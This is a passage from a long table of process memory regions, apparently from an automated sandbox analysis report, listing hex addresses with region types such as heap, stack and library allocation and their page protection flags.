|
stack
|
page read and write
|
||
67C8000
|
heap
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
AD5000
|
heap
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
6B3D000
|
heap
|
page read and write
|
||
28BF000
|
stack
|
page read and write
|
||
2690000
|
heap
|
page read and write
|
||
5320000
|
heap
|
page read and write
|
||
3232000
|
heap
|
page read and write
|
||
75DB000
|
trusted library allocation
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
5C4D000
|
stack
|
page read and write
|
||
56B2000
|
heap
|
page read and write
|
||
7470000
|
heap
|
page read and write
|
||
D461000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
3237000
|
stack
|
page read and write
|
||
2C5D000
|
heap
|
page read and write
|
||
6EB0000
|
heap
|
page read and write
|
||
1180000
|
heap
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
74DE000
|
stack
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
775F000
|
stack
|
page read and write
|
||
6B3D000
|
heap
|
page read and write
|
||
7C9E000
|
stack
|
page read and write
|
||
361F000
|
stack
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
56B3000
|
heap
|
page read and write
|
||
55A2000
|
heap
|
page read and write
|
||
E4F1000
|
trusted library allocation
|
page read and write
|
||
559E000
|
heap
|
page read and write
|
||
6B7A000
|
heap
|
page read and write
|
||
722E000
|
stack
|
page read and write
|
||
892D000
|
stack
|
page read and write
|
||
2B98000
|
heap
|
page read and write
|
||
6DD5000
|
trusted library allocation
|
page read and write
|
||
7022D000
|
unkown
|
page read and write
|
||
8050000
|
trusted library allocation
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
5E0E000
|
trusted library allocation
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
757D000
|
stack
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
66E4000
|
heap
|
page read and write
|
||
4F11000
|
heap
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
7131000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
7159000
|
heap
|
page read and write
|
||
8880000
|
trusted library allocation
|
page execute and read and write
|
||
718F000
|
heap
|
page read and write
|
||
6C9D000
|
stack
|
page read and write
|
||
7FC70000
|
trusted library allocation
|
page execute and read and write
|
||
3237000
|
heap
|
page read and write
|
||
4EA8000
|
trusted library allocation
|
page read and write
|
||
7126000
|
heap
|
page read and write
|
||
4F62000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
8AAD000
|
stack
|
page read and write
|
||
4F21000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
7654000
|
trusted library allocation
|
page read and write
|
||
757B000
|
stack
|
page read and write
|
||
79F0000
|
heap
|
page read and write
|
||
2C5F000
|
heap
|
page read and write
|
||
322C000
|
heap
|
page read and write
|
||
4EC0000
|
trusted library allocation
|
page execute and read and write
|
||
4DD5000
|
trusted library allocation
|
page execute and read and write
|
||
93C000
|
stack
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
2A3C000
|
stack
|
page read and write
|
||
4622000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
7B30000
|
trusted library allocation
|
page read and write
|
||
4FAB000
|
heap
|
page read and write
|
||
6862000
|
heap
|
page read and write
|
||
45B0000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
776C000
|
heap
|
page read and write
|
||
713B000
|
heap
|
page read and write
|
||
30B2000
|
heap
|
page read and write
|
||
7129000
|
heap
|
page read and write
|
||
4F5D000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
2C7A000
|
heap
|
page read and write
|
||
78FE000
|
stack
|
page read and write
|
||
6D90000
|
trusted library allocation
|
page execute
|
||
8CA1000
|
trusted library allocation
|
page read and write
|
||
3224000
|
heap
|
page read and write
|
||
5041000
|
trusted library allocation
|
page read and write
|
||
509C000
|
trusted library allocation
|
page read and write
|
||
6B37000
|
heap
|
page read and write
|
||
8890000
|
trusted library allocation
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
5706000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
5198000
|
trusted library allocation
|
page read and write
|
||
32B0000
|
heap
|
page read and write
|
||
3637000
|
heap
|
page read and write
|
||
7B10000
|
trusted library allocation
|
page read and write
|
||
323E000
|
heap
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
532E000
|
stack
|
page read and write
|
||
7DCD000
|
stack
|
page read and write
|
||
7041000
|
heap
|
page read and write
|
||
DAC000
|
stack
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
57BB000
|
stack
|
page read and write
|
||
82ED000
|
stack
|
page read and write
|
||
5503000
|
trusted library allocation
|
page read and write
|
||
30C9000
|
heap
|
page read and write
|
||
7E80000
|
trusted library allocation
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
55AF000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
2B8E000
|
stack
|
page read and write
|
||
4F29000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
4F55000
|
heap
|
page read and write
|
||
6C14000
|
trusted library allocation
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
51F5000
|
trusted library allocation
|
page read and write
|
||
BF0000
|
heap
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
268C000
|
stack
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
4650000
|
heap
|
page readonly
|
||
8C62000
|
trusted library allocation
|
page read and write
|
||
2C46000
|
heap
|
page read and write
|
||
7A3C000
|
stack
|
page read and write
|
||
4F67000
|
heap
|
page read and write
|
||
2C89000
|
heap
|
page read and write
|
||
7182000
|
heap
|
page read and write
|
||
76BD000
|
stack
|
page read and write
|
||
711B000
|
heap
|
page read and write
|
||
777F000
|
stack
|
page read and write
|
||
4B20000
|
heap
|
page readonly
|
||
66DD000
|
heap
|
page read and write
|
||
66F0000
|
heap
|
page read and write
|
||
7B59000
|
heap
|
page read and write
|
||
2C46000
|
heap
|
page read and write
|
||
71AE000
|
stack
|
page read and write
|
||
4EF0000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
4F14000
|
heap
|
page read and write
|
||
7171000
|
heap
|
page read and write
|
||
75DE000
|
stack
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
4DAD000
|
trusted library allocation
|
page execute and read and write
|
||
3665000
|
trusted library allocation
|
page execute and read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
70AC000
|
heap
|
page read and write
|
||
6671000
|
heap
|
page read and write
|
||
4FAF000
|
heap
|
page read and write
|
||
3244000
|
heap
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
5200000
|
heap
|
page execute and read and write
|
||
303A000
|
heap
|
page read and write
|
||
7387000
|
heap
|
page read and write
|
||
89F0000
|
trusted library allocation
|
page read and write
|
||
C461000
|
trusted library allocation
|
page read and write
|
||
2C5D000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
2C67000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
6B5A000
|
heap
|
page read and write
|
||
6878000
|
trusted library allocation
|
page read and write
|
||
5D4E000
|
stack
|
page read and write
|
||
712F000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
4F19000
|
heap
|
page read and write
|
||
4C61000
|
trusted library allocation
|
page read and write
|
||
70226000
|
unkown
|
page readonly
|
||
5694000
|
heap
|
page read and write
|
||
58BD000
|
stack
|
page read and write
|
||
3436000
|
heap
|
page read and write
|
||
8AF0000
|
heap
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
6D9A000
|
heap
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
DE61000
|
trusted library allocation
|
page read and write
|
||
56FA000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
50A4000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
832E000
|
stack
|
page read and write
|
||
30FD000
|
heap
|
page read and write
|
||
685A000
|
heap
|
page read and write
|
||
6B7A000
|
heap
|
page read and write
|
||
6049000
|
trusted library allocation
|
page read and write
|
||
6B22000
|
heap
|
page read and write
|
||
4B30000
|
heap
|
page read and write
|
||
88B0000
|
trusted library allocation
|
page read and write
|
||
323E000
|
heap
|
page read and write
|
||
4F34000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
155F000
|
stack
|
page read and write
|
||
7127000
|
heap
|
page read and write
|
||
3450000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
66E4000
|
heap
|
page read and write
|
||
786E000
|
stack
|
page read and write
|
||
322F000
|
heap
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
712F000
|
heap
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
763A000
|
trusted library allocation
|
page read and write
|
||
27AB000
|
stack
|
page read and write
|
||
6B25000
|
heap
|
page read and write
|
||
940E000
|
stack
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
6873000
|
trusted library allocation
|
page read and write
|
||
6862000
|
heap
|
page read and write
|
||
52BD000
|
stack
|
page read and write
|
||
5284000
|
trusted library allocation
|
page read and write
|
||
3662000
|
trusted library allocation
|
page read and write
|
||
7446000
|
heap
|
page read and write
|
||
8AC6000
|
heap
|
page read and write
|
||
6862000
|
heap
|
page read and write
|
||
4F1B000
|
heap
|
page read and write
|
||
771E000
|
heap
|
page read and write
|
||
4F5E000
|
stack
|
page read and write
|
||
6827000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
6B7A000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
73FE000
|
stack
|
page read and write
|
||
6C10000
|
trusted library allocation
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
5010000
|
heap
|
page read and write
|
||
7AA5000
|
heap
|
page read and write
|
||
324D000
|
heap
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page execute and read and write
|
||
6B11000
|
heap
|
page read and write
|
||
7E60000
|
trusted library allocation
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
354E000
|
stack
|
page read and write
|
||
2CEA000
|
stack
|
page read and write
|
||
4C0E000
|
stack
|
page read and write
|
||
7410000
|
heap
|
page execute and read and write
|
||
687A000
|
trusted library allocation
|
page read and write
|
||
32CE000
|
stack
|
page read and write
|
||
796E000
|
stack
|
page read and write
|
||
5057000
|
heap
|
page read and write
|
||
145E000
|
stack
|
page read and write
|
||
2C77000
|
heap
|
page read and write
|
||
3409000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page execute and read and write
|
||
73AD000
|
heap
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
577F000
|
stack
|
page read and write
|
||
747D000
|
stack
|
page read and write
|
||
338C000
|
heap
|
page read and write
|
||
5212000
|
trusted library allocation
|
page read and write
|
||
475C000
|
stack
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
7170000
|
heap
|
page read and write
|
||
7CC0000
|
heap
|
page execute and read and write
|
||
7B6D000
|
heap
|
page read and write
|
||
716A000
|
heap
|
page read and write
|
||
3223000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
6886000
|
trusted library allocation
|
page read and write
|
||
4620000
|
trusted library allocation
|
page read and write
|
||
8560000
|
heap
|
page read and write
|
||
3464000
|
trusted library allocation
|
page read and write
|
||
3650000
|
trusted library allocation
|
page read and write
|
||
7772000
|
heap
|
page read and write
|
||
27E5000
|
heap
|
page read and write
|
||
51BD000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
6C17000
|
trusted library allocation
|
page read and write
|
||
6B37000
|
heap
|
page read and write
|
||
6371000
|
trusted library allocation
|
page read and write
|
||
4760000
|
heap
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
3640000
|
trusted library allocation
|
page read and write
|
||
543D000
|
trusted library allocation
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
7022D000
|
unkown
|
page read and write
|
||
2C50000
|
heap
|
page read and write
|
||
2BE2000
|
heap
|
page read and write
|
||
67C8000
|
heap
|
page read and write
|
||
5567000
|
heap
|
page read and write
|
||
5385000
|
heap
|
page read and write
|
||
6871000
|
trusted library allocation
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
4F1C000
|
stack
|
page read and write
|
||
2C6C000
|
heap
|
page read and write
|
||
5021000
|
heap
|
page read and write
|
||
7B9D000
|
heap
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
3238000
|
stack
|
page read and write
|
||
1268000
|
heap
|
page read and write
|
||
51B3000
|
trusted library allocation
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
713C000
|
heap
|
page read and write
|
||
55C8000
|
heap
|
page read and write
|
||
734B000
|
trusted library allocation
|
page read and write
|
||
6518000
|
trusted library allocation
|
page read and write
|
||
687A000
|
trusted library allocation
|
page read and write
|
||
6B37000
|
heap
|
page read and write
|
||
7DD0000
|
trusted library allocation
|
page read and write
|
||
7BB1000
|
heap
|
page read and write
|
||
3660000
|
trusted library allocation
|
page read and write
|
||
35BA000
|
heap
|
page read and write
|
||
4FFF000
|
stack
|
page read and write
|
||
6873000
|
trusted library allocation
|
page read and write
|
||
3229000
|
heap
|
page read and write
|
||
504B000
|
heap
|
page read and write
|
||
33FA000
|
heap
|
page read and write
|
||
56B2000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
1260000
|
heap
|
page read and write
|
||
324A000
|
heap
|
page read and write
|
||
6B7A000
|
heap
|
page read and write
|
||
51DA000
|
trusted library allocation
|
page read and write
|
||
4609000
|
trusted library allocation
|
page read and write
|
||
76DF000
|
stack
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
8AFC000
|
heap
|
page read and write
|
||
2FCC000
|
stack
|
page read and write
|
||
8E70000
|
trusted library allocation
|
page read and write
|
||
685A000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
3228000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
7022D000
|
unkown
|
page read and write
|
||
33DE000
|
stack
|
page read and write
|
||
7149000
|
heap
|
page read and write
|
||
7022F000
|
unkown
|
page readonly
|
||
70226000
|
unkown
|
page readonly
|
||
7B12000
|
trusted library allocation
|
page read and write
|
||
3312000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
323B000
|
heap
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
4F7E000
|
stack
|
page read and write
|
||
2C4D000
|
heap
|
page read and write
|
||
588B000
|
stack
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
324F000
|
heap
|
page read and write
|
||
7B00000
|
heap
|
page execute and read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
7131000
|
heap
|
page read and write
|
||
3447000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
76ED000
|
stack
|
page read and write
|
||
4ED0000
|
trusted library allocation
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
264B000
|
stack
|
page read and write
|
||
71C4000
|
heap
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
80DE000
|
stack
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
4E3E000
|
stack
|
page read and write
|
||
3385000
|
heap
|
page read and write
|
||
4AB7000
|
trusted library allocation
|
page execute and read and write
|
||
66A3000
|
heap
|
page read and write
|
||
322A000
|
heap
|
page read and write
|
||
5520000
|
trusted library allocation
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
3235000
|
heap
|
page read and write
|
||
4F31000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
7FC88000
|
trusted library allocation
|
page execute and read and write
|
||
7194000
|
heap
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
3225000
|
heap
|
page read and write
|
||
6B25000
|
heap
|
page read and write
|
||
51A1000
|
trusted library allocation
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
6B23000
|
heap
|
page read and write
|
||
6833000
|
heap
|
page read and write
|
||
322C000
|
heap
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
680E000
|
trusted library allocation
|
page read and write
|
||
2A20000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
75E0000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
527C000
|
stack
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
6BBA000
|
heap
|
page read and write
|
||
4660000
|
trusted library allocation
|
page execute and read and write
|
||
66F0000
|
heap
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
7391000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
4600000
|
trusted library allocation
|
page read and write
|
||
568D000
|
heap
|
page read and write
|
||
56B3000
|
heap
|
page read and write
|
||
7171000
|
heap
|
page read and write
|
||
26B0000
|
heap
|
page read and write
|
||
3510000
|
trusted library allocation
|
page read and write
|
||
5530000
|
heap
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
7D6E000
|
stack
|
page read and write
|
||
6BBA000
|
heap
|
page read and write
|
||
45F0000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
C71000
|
heap
|
page read and write
|
||
61C9000
|
trusted library allocation
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
2C46000
|
heap
|
page read and write
|
||
2C72000
|
heap
|
page read and write
|
||
2C96000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
6C17000
|
trusted library allocation
|
page read and write
|
||
46BE000
|
stack
|
page read and write
|
||
80F0000
|
trusted library allocation
|
page execute and read and write
|
||
5682000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
4E90000
|
heap
|
page readonly
|
||
63D9000
|
trusted library allocation
|
page read and write
|
||
3610000
|
trusted library allocation
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
26AB000
|
stack
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
54D7000
|
trusted library allocation
|
page read and write
|
||
4767000
|
heap
|
page read and write
|
||
8870000
|
heap
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
260E000
|
stack
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
3238000
|
heap
|
page read and write
|
||
8AD5000
|
heap
|
page read and write
|
||
6B3D000
|
heap
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page execute and read and write
|
||
719A000
|
heap
|
page read and write
|
||
685A000
|
heap
|
page read and write
|
||
7A2D000
|
stack
|
page read and write
|
||
500E000
|
stack
|
page read and write
|
||
66E9000
|
heap
|
page read and write
|
||
70211000
|
unkown
|
page execute read
|
||
7609000
|
trusted library allocation
|
page read and write
|
||
88A0000
|
heap
|
page read and write
|
||
763E000
|
stack
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
70A0000
|
direct allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page execute and read and write
|
||
687A000
|
trusted library allocation
|
page read and write
|
||
56FD000
|
heap
|
page read and write
|
||
76E0000
|
heap
|
page read and write
|
||
3229000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
2C8A000
|
heap
|
page read and write
|
||
3623000
|
trusted library allocation
|
page execute and read and write
|
||
7BFF000
|
heap
|
page read and write
|
||
7182000
|
heap
|
page read and write
|
||
7A59000
|
heap
|
page read and write
|
||
6827000
|
heap
|
page read and write
|
||
5588000
|
heap
|
page read and write
|
||
2BE2000
|
heap
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
5682000
|
heap
|
page read and write
|
||
2C75000
|
heap
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
675C000
|
heap
|
page read and write
|
||
3256000
|
heap
|
page read and write
|
||
793E000
|
stack
|
page read and write
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
52B0000
|
trusted library allocation
|
page read and write
|
||
6B20000
|
heap
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
4DA4000
|
trusted library allocation
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
7ABE000
|
heap
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
55AA000
|
heap
|
page read and write
|
||
7B3D000
|
stack
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
45F3000
|
trusted library allocation
|
page execute and read and write
|
||
570E000
|
heap
|
page read and write
|
||
78EE000
|
stack
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
8A60000
|
heap
|
page read and write
|
||
2C4C000
|
heap
|
page read and write
|
||
54CF000
|
trusted library allocation
|
page read and write
|
||
7194000
|
heap
|
page read and write
|
||
702A000
|
stack
|
page read and write
|
||
4C50000
|
heap
|
page execute and read and write
|
||
7132000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
2C69000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
7022D000
|
unkown
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
6B3D000
|
heap
|
page read and write
|
||
5703000
|
heap
|
page read and write
|
||
7D8E000
|
stack
|
page read and write
|
||
7A23000
|
heap
|
page read and write
|
||
3280000
|
heap
|
page read and write
|
||
88FF000
|
stack
|
page read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
52D0000
|
trusted library allocation
|
page read and write
|
||
7134000
|
heap
|
page read and write
|
||
324C000
|
heap
|
page read and write
|
||
5593000
|
heap
|
page read and write
|
||
55A3000
|
heap
|
page read and write
|
||
2C7D000
|
heap
|
page read and write
|
||
5703000
|
heap
|
page read and write
|
||
3249000
|
heap
|
page read and write
|
||
5689000
|
heap
|
page read and write
|
||
4CC1000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
5224000
|
heap
|
page read and write
|
||
2DE6000
|
stack
|
page read and write
|
||
4AF0000
|
trusted library allocation
|
page read and write
|
||
7B41000
|
heap
|
page read and write
|
||
769E000
|
stack
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
8B14000
|
heap
|
page read and write
|
||
6863000
|
heap
|
page read and write
|
||
8B0A000
|
heap
|
page read and write
|
||
70210000
|
unkown
|
page readonly
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
6B23000
|
heap
|
page read and write
|
||
7342000
|
trusted library allocation
|
page read and write
|
||
53D0000
|
heap
|
page read and write
|
||
5565000
|
heap
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
7040000
|
direct allocation
|
page read and write
|
||
4DD2000
|
trusted library allocation
|
page read and write
|
||
681B000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
7440000
|
trusted library allocation
|
page read and write
|
||
5297000
|
heap
|
page read and write
|
||
504E000
|
stack
|
page read and write
|
||
8980000
|
heap
|
page read and write
|
||
6A4D000
|
heap
|
page read and write
|
||
2C46000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
6B35000
|
heap
|
page read and write
|
||
CAD000
|
stack
|
page read and write
|
||
6B3D000
|
heap
|
page read and write
|
||
46FF000
|
stack
|
page read and write
|
||
7194000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
66E4000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
4B1E000
|
stack
|
page read and write
|
||
2C29000
|
heap
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
4A99000
|
trusted library allocation
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
8340000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
33CE000
|
stack
|
page read and write
|
||
29BF000
|
stack
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
814F000
|
stack
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
5380000
|
heap
|
page read and write
|
||
687A000
|
trusted library allocation
|
page read and write
|
||
7CAA000
|
trusted library allocation
|
page read and write
|
||
3477000
|
heap
|
page read and write
|
||
7B87000
|
heap
|
page read and write
|
||
7080000
|
direct allocation
|
page read and write
|
||
7A6C000
|
trusted library allocation
|
page read and write
|
||
2C5D000
|
heap
|
page read and write
|
||
2B49000
|
heap
|
page read and write
|
||
71D3000
|
heap
|
page read and write
|
||
6C1B000
|
trusted library allocation
|
page read and write
|
||
47F0000
|
heap
|
page read and write
|
||
6B27000
|
heap
|
page read and write
|
||
55A1000
|
heap
|
page read and write
|
||
7040000
|
heap
|
page read and write
|
||
6C17000
|
trusted library allocation
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
83CE000
|
stack
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
79EE000
|
stack
|
page read and write
|
||
70210000
|
unkown
|
page readonly
|
||
6B1C000
|
heap
|
page read and write
|
||
719F000
|
heap
|
page read and write
|
||
17F0000
|
heap
|
page read and write
|
||
6F10000
|
trusted library allocation
|
page read and write
|
||
4F4D000
|
heap
|
page read and write
|
||
76EE000
|
stack
|
page read and write
|
||
2CE8000
|
stack
|
page read and write
|
||
76AB000
|
stack
|
page read and write
|
||
2C81000
|
heap
|
page read and write
|
||
7780000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
896E000
|
stack
|
page read and write
|
||
70EE000
|
stack
|
page read and write
|
||
6041000
|
trusted library allocation
|
page read and write
|
||
5689000
|
heap
|
page read and write
|
||
7841000
|
heap
|
page read and write
|
||
333E000
|
unkown
|
page read and write
|
||
6810000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
2C5D000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
745F000
|
stack
|
page read and write
|
||
2BA9000
|
heap
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
2C75000
|
heap
|
page read and write
|
||
3244000
|
heap
|
page read and write
|
||
6515000
|
trusted library allocation
|
page read and write
|
||
8ABA000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
5436000
|
trusted library allocation
|
page read and write
|
||
29FD000
|
stack
|
page read and write
|
||
797E000
|
stack
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
79AF000
|
stack
|
page read and write
|
||
5705000
|
heap
|
page read and write
|
||
30D6000
|
heap
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
7022D000
|
unkown
|
page read and write
|
||
8AE7000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
56FD000
|
heap
|
